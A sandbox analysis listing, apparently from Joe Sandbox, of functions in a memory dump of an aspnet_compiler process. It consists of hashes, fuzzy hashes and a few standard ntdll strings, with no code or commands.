                                                      • Opcode ID: 93094178b70dd2280a70af3699a192e9de943d4890cbe309ab889102ff35e239
                                                      • Instruction ID: 6c6e80d6a6a8c04cdc40e59521c1cc6cc2b0b11f820066e2089137e7868e111b
                                                      • Opcode Fuzzy Hash: 93094178b70dd2280a70af3699a192e9de943d4890cbe309ab889102ff35e239
                                                      • Instruction Fuzzy Hash: 7B90023264180442D146715844046060409A7D0281F95C052A0424599EC7558B96AB61
                                                      Function 01AF2DD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bdeafcfaff5bd443f8cd98f5972ae45d3ad3602931c77fb7cba3fc346bce335
                                                      • Instruction ID: e5d1d78cb13ca353faa0c69b5a9c1c7250b73d7208235d7124401e21932a6232
                                                      • Opcode Fuzzy Hash: 4bdeafcfaff5bd443f8cd98f5972ae45d3ad3602931c77fb7cba3fc346bce335
                                                      • Instruction Fuzzy Hash: 9D90022264284192554AB15844045074406A7E0281795C052A1414995CC6269A96D721
                                                      Function 01AF2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cf671421cf7985266ba78a0a25ad85213c5620e0ad04b460ae26b652b15bb91
                                                      • Instruction ID: aa3f59700df4ea21a01dafbe71f5485e58c6fab93c16e0c4866a49b8f115c78e
                                                      • Opcode Fuzzy Hash: 5cf671421cf7985266ba78a0a25ad85213c5620e0ad04b460ae26b652b15bb91
                                                      • Instruction Fuzzy Hash: ED90022270180043D145715854186064405E7E1341F55D051E0414599CDA158A965322
                                                      Function 01AF2D00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 92d9b0c81aeb8280888ab7d409652f8948c75d4cde9cf1f4c6275d11658ac48e
                                                      • Instruction ID: 78eedb609621eddc6d8bd675da3f2f1c955e7953674934a60348ff937699882e
                                                      • Opcode Fuzzy Hash: 92d9b0c81aeb8280888ab7d409652f8948c75d4cde9cf1f4c6275d11658ac48e
                                                      • Instruction Fuzzy Hash: 9390022260584482D10575585408A06040597D0245F55D051A10645DADC7358A91A231
                                                      Function 01AF2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a8d68a826b632640ce244288d28c60dcbb5078a5f2813083568e56899e98a0c
                                                      • Instruction ID: 48fa016c9bf58239440e6d3bd13181afdc0d132546e264381c36be62bb87256a
                                                      • Opcode Fuzzy Hash: 7a8d68a826b632640ce244288d28c60dcbb5078a5f2813083568e56899e98a0c
                                                      • Instruction Fuzzy Hash: 9990022A61380042D1857158540860A040597D1242F95D455A001559DCCA158AA95321
                                                      Function 01AF2CA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 159f5254c83419512b5514a1806c67b4c11f14a36bfe8d693edac6c92facc208
                                                      • Instruction ID: d83596a00b7945e667c191641d7a3ad0f3ebe2c5bb572e97272288d31da4b23f
                                                      • Opcode Fuzzy Hash: 159f5254c83419512b5514a1806c67b4c11f14a36bfe8d693edac6c92facc208
                                                      • Instruction Fuzzy Hash: 5590023260180442D10575985408646040597E0341F55D051A502459AEC7658AD16231
                                                      Function 01AF2CF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b880c149d6a1ad6b752bc68d309ff2d5de499c9d65d728ac342f7752afa7742
                                                      • Instruction ID: 7d93026be31d2861d627a812e2804fc54f9aa4c8db82d4a3307d4d429d870c0c
                                                      • Opcode Fuzzy Hash: 6b880c149d6a1ad6b752bc68d309ff2d5de499c9d65d728ac342f7752afa7742
                                                      • Instruction Fuzzy Hash: CE90023260180443D10571585508707040597D0241F55D451A042459DDD7568A916221
                                                      Function 01AF2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56b8cc1bede362571fc3d4b79d8c77ec43889ff5c68f65cfecad7713ffd71926
                                                      • Instruction ID: 090fa2b0a5639f90bfd4b1f43fbfc1c633091e0660211191b9d64b38dfae0e55
                                                      • Opcode Fuzzy Hash: 56b8cc1bede362571fc3d4b79d8c77ec43889ff5c68f65cfecad7713ffd71926
                                                      • Instruction Fuzzy Hash: 08900222A0580442D14571585418706041597D0241F55D051A0024599DC7598B9567A1
                                                      Function 01AF2C60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a37f7e4c6d084b94c649bed0da3c3de3148cfa6959070f3c43cdfc18b8662b28
                                                      • Instruction ID: 20be5e3b3166570e713eecb5a4981eef92eae745aa13dae647b8b9becddc8d36
                                                      • Opcode Fuzzy Hash: a37f7e4c6d084b94c649bed0da3c3de3148cfa6959070f3c43cdfc18b8662b28
                                                      • Instruction Fuzzy Hash: 5590023260180882D10571584404B46040597E0341F55C056A0124699DC715CA917621
                                                      Function 01AF2FA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
                                                      • Instruction ID: 26059bc958de6bfdc2ce077244d39d6ff4592bc0cf9541c24c2e0db5b0d09e91
                                                      • Opcode Fuzzy Hash: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
                                                      • Instruction Fuzzy Hash: A2900232601C0442D10571584808747040597D0342F55C051A516459AEC765CAD16631
                                                      Function 01AF2FB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
                                                      • Instruction ID: 1336aab368ed1ba5b40453f04e8f27da38a4843bdc25962be64c934d0a189a7c
                                                      • Opcode Fuzzy Hash: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
                                                      • Instruction Fuzzy Hash: 6E900222A01800824145716888449064405BBE1251755C161A0998595DC6598AA55765
                                                      Function 01AF2F90 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
                                                      • Instruction ID: e3d722858902d8bb0b2818b5d445f1c80ac136f3e5b8bed2622549d44c60200e
                                                      • Opcode Fuzzy Hash: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
                                                      • Instruction Fuzzy Hash: F9900232601C0442D1057158481470B040597D0342F55C051A116459ADC7258A916671
                                                      Function 01AF2FE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
                                                      • Instruction ID: 833ddf8ed4b81c7a396ddd0d2e2a803ca5e8e2b66eb9027f8d7c1340a86cc52f
                                                      • Opcode Fuzzy Hash: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
                                                      • Instruction Fuzzy Hash: 57900222611C0082D20575684C14B07040597D0343F55C155A0154599CCA158AA15621
                                                      Function 01AF2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
                                                      • Instruction ID: 14060e5e22a0f02ff0ed41e3075afa9906c756b2e3af70eeabba2b96cda46948
                                                      • Opcode Fuzzy Hash: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
                                                      • Instruction Fuzzy Hash: E190026274180482D10571584414B060405D7E1341F55C055E1064599DC719CE926226
                                                      Function 01AF2F60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
                                                      • Instruction ID: 3091b2df3532f631e640ff903c121f2cbd62d1d87f0cb57d4afcebbac3ab1dad
                                                      • Opcode Fuzzy Hash: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
                                                      • Instruction Fuzzy Hash: 7690026261180082D10971584404706044597E1241F55C052A2154599CC6298EA15225
                                                      Function 01AF2EA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
                                                      • Instruction ID: f98de20f1c0d4d2f4f9fcb468e5053ba30529a6935d88780b0236d6d76bee596
                                                      • Opcode Fuzzy Hash: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
                                                      • Instruction Fuzzy Hash: 1E90027260180442D14571584404746040597D0341F55C051A5064599EC7598FD56765
                                                      Function 01AF2E80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
                                                      • Instruction ID: 1caedc964de7fb8b4424711dd73c0e91aaaa538642a18c914ead6c804e2b9d9f
                                                      • Opcode Fuzzy Hash: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
                                                      • Instruction Fuzzy Hash: 51900222A0180542D10671584404616040A97D0281F95C062A102459AECB258BD2A231
                                                      Function 01AF2EE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
                                                      • Instruction ID: b2fdbcf6edff2816614b1c2ec5b9cfea2ef5c514686f7765c50a3708f16b110c
                                                      • Opcode Fuzzy Hash: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
                                                      • Instruction Fuzzy Hash: 40900262601C0443D14575584804607040597D0342F55C051A206459AECB298E916235
                                                      Function 01AF2E30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
                                                      • Instruction ID: 677173c7911cb85eb0c48e3bc8f13e194e831d74a16dadf0353e09945efdf384
                                                      • Opcode Fuzzy Hash: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
                                                      • Instruction Fuzzy Hash: 1290022270180442D107715844146060409D7D1385F95C052E142459ADC7258B93A232
                                                      Function 01AF3090 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 926a8404f26061c7d4193bfb2870f7a8a5c11a1f3d4db2fbb75afe99f5b06510
                                                      • Instruction ID: 09b4c82992bea4b54482c0dbb153a67acb4b3d67ba5ef94e183d6670791400e1
                                                      • Opcode Fuzzy Hash: 926a8404f26061c7d4193bfb2870f7a8a5c11a1f3d4db2fbb75afe99f5b06510
                                                      • Instruction Fuzzy Hash: 1D90022264180842D145715884147070406D7D0641F55C051A0024599DC7168BA567B1
                                                      Function 01AF3010 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d804b278630f0c976af6f5a491cde110a171a51eee00b274feb0e14729aef094
                                                      • Instruction ID: 9ffb4703245dddef05847e4aeca554ec6ea0227343ae9fe593b9756f9197effc
                                                      • Opcode Fuzzy Hash: d804b278630f0c976af6f5a491cde110a171a51eee00b274feb0e14729aef094
                                                      • Instruction Fuzzy Hash: 94900222601C4482D14572584804B0F450597E1242F95C059A4156599CCA158A955721
                                                      Function 01AF39B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49a45d8f1cd9ed5c5ee5d5686c020d9c8fa8ee882b7e2f973cfb69bebb7779d4
                                                      • Instruction ID: a9b9b8ee810fcd59b1b683d8fac2c926dc429860e876f0596450b941695c9dd9
                                                      • Opcode Fuzzy Hash: 49a45d8f1cd9ed5c5ee5d5686c020d9c8fa8ee882b7e2f973cfb69bebb7779d4
                                                      • Instruction Fuzzy Hash: DD90022264585142D155715C44046164405B7E0241F55C061A08145D9DC6558A956321
                                                      Function 01AF3D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e91b7c9d3db6c6cd4ea613081d85603a88e6ee3c5b0c9ee4d1ca863a8a9a5a7
                                                      • Instruction ID: 3a30424dd2b9fd0d00ac22aceab9f36e97986060f6a90be696b1b0cc66ff16ae
                                                      • Opcode Fuzzy Hash: 4e91b7c9d3db6c6cd4ea613081d85603a88e6ee3c5b0c9ee4d1ca863a8a9a5a7
                                                      • Instruction Fuzzy Hash: 7090023260280182954572585804A4E450597E1342B95D455A0015599CCA148AA15321
                                                      Function 01AF3D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82efa76704457b1f03e0b4fe3069007869b501c5a9ee8c18085e4cd90347d58f
                                                      • Instruction ID: cc25a8345ca1c29f00bf1246e3e8c3e8bab6d54e178dbc07f6032e3a2babe7f6
                                                      • Opcode Fuzzy Hash: 82efa76704457b1f03e0b4fe3069007869b501c5a9ee8c18085e4cd90347d58f
                                                      • Instruction Fuzzy Hash: C790023660180442D51571585804646044697D0341F55D451A042459DDC7548AE1A221
                                                      Function 01AF2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: d1c13ae296f594338205f387ca54148b2c9fe58baae30b2c71f14179e29606f6
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 01AF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
                                                      • Instruction ID: 831c91cb8b726f709f8a9bbbe02347a6cebabce3a4642ab2f43219ac7c85ee98
                                                      • Opcode Fuzzy Hash: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
                                                      • Instruction Fuzzy Hash: 3C51B6B5A00156BFDB15DBEC8890A7FFBB8BB08240B54826EF569D7641D334DE4487E0
                                                      Function 01B62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
                                                      • Instruction ID: b9d4ef648b656e219604a9d1ee896c5f8f8c665482c46c0587f6518a53dc7beb
                                                      • Opcode Fuzzy Hash: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
                                                      • Instruction Fuzzy Hash: 4D51F575A00646AEEF39DE5CC89097EBBFCEF54200B4484EAE5D6C7681E778DA408760
                                                      Function 01AE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Execute=1, xrefs: 01B24713
                                                      • ExecuteOptions, xrefs: 01B246A0
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B24787
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B24655
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B24742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B246FC
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B24725
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
                                                      • Instruction ID: 6fac249583febfa7464bcd1102710df9592e355e9c3f0221059b9db127670a21
                                                      • Opcode Fuzzy Hash: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
                                                      • Instruction Fuzzy Hash: 95512B3160021ABAEF25ABE8DC99FBE77F8EF14314F0400D9E605AB191D7709A458F91
                                                      Function 01B86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: 58adcf44bbb8df271d0aac8b8795565953e6a340f0454bf5623df691cefa6873
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 5F022971508342AFD709DF18C590E6BBBE5EFC8B04F148A6DFA8987254DB31E905CB52
                                                      Function 01AFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 5e535ebcff1d741b9cd3143b13896f31b7315d5bfd3a2424cff256eecbaaf511
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 39817F70E062499EEF258FECC8517EEBBB2AF85360F1C415DFA51A7291C73498408BB1
                                                      Function 01B620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
                                                      • Instruction ID: 9fc288ecf60332809f5209b09c6701d09980324c0ff99f52bfbba8d777a86018
                                                      • Opcode Fuzzy Hash: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
                                                      • Instruction Fuzzy Hash: 2B213676E00119ABEB15DF69D841AFE7BFCEF64654F44019AEA05D3240E734DA018791
